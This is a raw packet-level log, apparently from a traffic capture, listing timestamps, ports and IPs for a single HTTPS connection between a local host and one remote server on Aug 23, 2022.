Aug 23, 2022 18:24:44.916919947 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.917009115 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.917094946 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.917184114 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.917269945 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.917397976 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.917486906 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.917570114 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.917670012 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.917856932 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.917946100 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.918052912 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.918176889 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.918273926 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.923661947 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.923763037 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.924041033 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.924159050 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.924273968 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.924360991 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.924459934 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.924604893 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.924694061 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.924779892 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.924870968 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.924972057 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.937527895 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.938179970 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.941827059 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.941873074 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.944467068 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.945341110 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.945374012 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.949812889 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.949873924 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.953361988 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.953402042 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.956315041 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.956355095 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.960421085 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.960484028 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.962955952 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.962996006 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.966487885 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.966527939 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.970029116 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.970069885 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.973180056 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.973217010 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.977504015 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.977554083 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.980294943 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.980319023 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.983541965 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.983589888 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.987571001 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.987607956 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.990233898 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.990263939 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.994034052 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.994060040 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.996952057 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:44.996973038 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.000699043 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.000721931 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.004071951 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.004101038 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.007806063 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.007842064 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.011061907 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.011095047 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.015155077 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.015208960 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.017404079 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.017433882 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.021581888 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.021616936 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.024923086 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.024954081 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.027599096 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.027622938 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.031120062 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.031143904 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.034821033 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.034849882 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.037782907 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.037811041 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.041127920 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.041155100 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.044986010 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.045011997 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.048341990 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.048369884 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.051327944 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.051366091 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.054864883 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.054907084 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.058239937 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.058274031 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.061558008 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.061595917 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.452305079 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.782259941 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:45.782485008 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:45.782599926 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:45.798146963 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:45.798264027 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:45.798358917 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:45.798449039 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:45.798548937 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:45.798679113 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:45.798774958 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:45.798858881 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:45.798944950 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:45.801852942 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:45.803459883 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.803497076 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.807180882 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.807215929 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.810857058 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.818836927 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.818867922 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.822756052 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.822781086 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.825619936 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.825644970 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.829086065 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.829109907 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.832401991 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.832428932 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.835880041 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.835912943 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.839449883 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.839487076 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.842780113 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.842816114 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.846050024 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.846075058 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.849502087 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.849539995 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.869434118 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:45.869776011 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:45.870100021 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:45.871892929 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:45.872220993 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:45.872256041 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:45.872314930 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:45.872370958 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:45.872742891 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:45.874587059 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:45.879831076 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:45.890782118 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.890820980 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.894258022 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.894298077 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.897855043 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.897893906 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.898674011 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:45.900552988 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.900588036 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.904041052 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:45.905240059 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.905280113 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.908174038 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.908207893 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.912311077 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.912341118 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.914797068 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.914835930 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.918193102 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.918232918 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.921370983 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.921416044 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.924550056 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.924575090 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.927459955 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.927496910 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.930761099 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.930804014 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.933579922 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.933613062 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.936152935 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.936187983 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.938889027 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.938925982 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.942267895 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.942312956 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.944299936 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.944338083 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.947235107 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.947272062 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.949924946 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.949959040 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.953388929 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.953450918 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.955599070 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.955629110 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.958364010 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.958401918 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.961461067 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.961494923 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.964085102 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.964159966 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.966809034 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.966845989 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.969650030 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.969686031 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.972862005 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.972898960 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.974186897 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:45.974520922 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:45.974822044 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:45.975155115 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:45.975616932 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.975655079 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.976887941 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:45.978085041 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.978118896 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.980786085 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.980818987 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.981132984 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:45.984297037 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.984353065 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.986664057 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.986712933 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.986980915 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:45.989891052 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.989924908 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.992145061 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.992180109 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.994612932 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.994662046 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.997311115 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.997307062 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:45.997344971 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.999735117 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.999766111 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.999784946 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:45.999809980 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.000128031 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:46.001466990 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.001488924 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.001506090 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.001523018 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.003886938 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.003907919 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.003923893 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.003941059 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.005851984 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.005878925 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.005894899 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.005912066 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.007422924 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.007442951 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.008876085 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.008898020 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.008914948 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.008932114 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.010991096 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.011010885 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.011039019 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.011055946 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.013597965 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.013621092 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.013638020 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.013655901 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.014960051 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.015003920 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.015021086 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.015038013 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.017410994 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.017431021 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.017447948 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.017465115 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.019387007 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.019426107 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.019454002 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.019485950 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.020575047 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.020612001 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.022135973 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.022175074 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.022205114 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.022233009 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.024477959 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.024511099 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.024533987 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.024554014 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.024574995 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.024595976 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.027055025 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.027096987 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.027122974 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.027148962 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.027172089 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.027195930 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.029098988 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.029134989 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.029158115 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.029179096 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.031490088 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.031529903 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.031555891 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.031578064 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.031599998 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.031622887 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.033896923 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.033932924 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.033956051 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.033978939 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.033999920 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.034023046 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.036087990 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.036144018 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.036165953 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.108441114 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:46.129139900 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.129215002 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.129242897 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.129271030 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.131484032 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.380865097 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.584616899 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:46.584732056 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:46.586235046 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:46.586496115 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:46.586904049 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:46.588723898 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:46.589032888 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:46.589310884 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:46.590717077 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:46.605186939 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:46.605220079 CEST	443	51105	216.58.209.42	192.168.2.3
